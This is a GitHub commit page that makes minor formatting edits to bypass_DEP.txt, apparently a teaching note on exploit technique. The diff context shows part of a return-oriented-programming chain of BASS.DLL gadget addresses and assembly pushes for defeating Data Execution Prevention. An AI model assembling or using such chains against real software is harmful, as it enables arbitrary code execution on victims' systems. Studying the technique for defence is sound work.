Skip to content

Commit

Permalink
Update bypass_DEP.txt
Browse files Browse the repository at this point in the history
  • Loading branch information
Rev0x1337 authored Oct 20, 2024
1 parent 969396f commit d1cb729
Showing 1 changed file with 4 additions and 1 deletion.
5 changes: 4 additions & 1 deletion bypass_DEP.txt
Original file line number Diff line number Diff line change
@@ -1,3 +1,5 @@
Example:

0X10010157, # POP EBP # RETN [BASS.DLL]
0X10010157, # SKIP 4 BYTES [BASS.DLL]
0X10015F77, # POP EAX # RETN [BASS.DLL]
Expand All @@ -19,7 +21,8 @@
0X1001D7A5, # PUSHAD # RETN [BASS.DLL]
0X10022AA7, # PTR TO 'JMP ESP' [BASS.DLL]

In ASM
In ASM:

PUSH 0X201
PUSH 0X40
PUSH WRITEBLE_LOCATION
Expand Down

0 comments on commit d1cb729

Please sign in to comment.